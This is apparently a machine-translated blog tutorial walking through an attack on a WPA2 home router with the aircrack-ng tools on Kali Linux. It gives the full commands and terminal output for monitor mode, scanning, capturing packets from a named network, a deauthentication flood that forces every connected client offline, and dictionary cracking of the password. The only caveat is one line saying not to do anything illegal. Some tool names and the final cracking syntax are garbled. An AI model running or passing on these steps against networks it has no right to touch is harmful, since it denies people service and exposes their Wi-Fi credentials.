Actual combat of wireless routing attack

1, Preparation stage

  • Attack host: kali Linux
  • Attack tools: airrack ng, airdump ng, air ng, and air replay ng
  • One network card
You can check whether the network card is ready through the command: sudo iwconfig.

My network card name is wlan0

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

2, Attack phase

1. Stop 🛑 Network administrator and kill process

stop it 🛑 network administrator

sudo service network-manager stop

Kill process

sudo airmon-ng check kill

After the above two steps, you can find that the network card name has changed from wlan0 to wlan0mon

root@kali:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off

2. Enable network card monitoring mode

After monitoring is enabled, you can monitor nearby routing devices through the network card.

Syntax: sudo airport ng start network card name


sudo airmon-ng start wlan0mon

The following forms indicate successful opening!

root@kali:~# sudo airmon-ng start wlan0mon

PHY     Interface       Driver          Chipset

phy0    wlan0mon        rt2800usb       Ralink Technology, Corp. RT2870/RT3070

                (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)

3. Capture packets

Capturing data packets refers to scanning the nearby router through the network card. The distance of scanning is determined by the quality of your network card. Through scanning, you can get the MAC address (BSSID), channel (CH) value, WiFi name, encryption method, etc.

Syntax: airodump ng network card name


sudo airodump-ng wlan0mon

When you see the WiFi name of the route to be attacked (target), press CTRL+C to stop, as shown in the following figure: (I want to attack the router with the WiFi name of CMCC Qingfeng)

root@kali:~# airodump-ng wlan0mon

 CH 13 ][ Elapsed: 26 mins ][ 2020-08-15 23:57                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                          
 80:54:6A:6C:BA:C0  -50      407     4907   40   1  130   WPA2 CCMP   PSK  CMCC-QingFeng                                                  
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                        
 (not associated)   22:C9:4E:48:C1:16  -78    0 - 1      0       12                                                                        80:54:6A:6C:BA:C0  38:37:8B:07:71:69  -18    0e- 6      0      534                                                                       
 80:54:6A:6C:BA:C0  7C:B3:7B:95:BA:50  -62    0e- 0e     8     2476                                                                       
 80:54:6A:6C:BA:C0  F4:70:AB:95:A1:14  -78    0e- 1      0     1375                                                                       
 80:54:6A:6C:BA:C0  70:C9:4E:48:C1:16  -76    0e- 1    396     2485         CMCC-QingFeng                                                 

4. Get data package

The function of obtaining data packets is mainly to prepare for the following cracking.


sudo airodump-ng -c -w  --bssid  adapter name

Parameter Description:

  • -c: Channel value
  • -w: The saved path of the obtained packet
  • – bssid: MAC address


 sudo airodump-ng -c 1 -w /root/admin --bssid  80:54:6A:6C:BA:C0   wlan0mon

5. Inject data packet

Send data packets to the routing device continuously. In this process, all connected devices will be forced offline. If it can be cracked directly, it will be displayed in the upper right corner of the terminal in step 4. The fourth step is not shown in the figure. Some encryption methods are not easy to be cracked, which is affected by many factors, such as the strength of the dictionary and the host.


sudo aireplay-ng -0  n	-a	adapter name

Parameter Description:

  • -0: indicates that the authentication packet is cancelled
  • n: Indicates the number of attacks (the number of packets sent to the router)
  • -a: BSSID value of the corresponding router
  • Network card name: the name of your own network card, which can be viewed through sudo iwconfig


Step 4: don't close the terminal. Create a new terminal and enter the following code to attack the router. At this time, you can find that you can't connect to the router at all. If you have previously connected to the router, you can find that the client is forced offline after executing the following command. The length of time is determined by the number of attacks. In the following example, my number of attacks is 5.

sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon
root@kali:~# sudo aireplay-ng -0  5  -a   80:54:6A:6C:BA:C0  wlan0mon
00:34:39  Waiting for beacon frame (BSSID: 80:54:6A:6C:BA:C0) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
00:34:39  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]
00:34:40  Sending DeAuth (code 7) to broadcast -- BSSID: [80:54:6A:6C:BA:C0]

Note: when you execute the above command, all connected clients will be forced to offline. Remember! Remember! Remember, don't use this to do something illegal.

5.WiFi password cracking

This step is to crack the password. Whether you can crack it depends on the strength of your dictionary and the strength of the host. There is also the need to be patient. Ha ha!

Syntax: airtrack ng - W dictionary path has Cap path


Tags: security Router wifi

Posted by pradee on Sun, 22 May 2022 11:24:31 +0300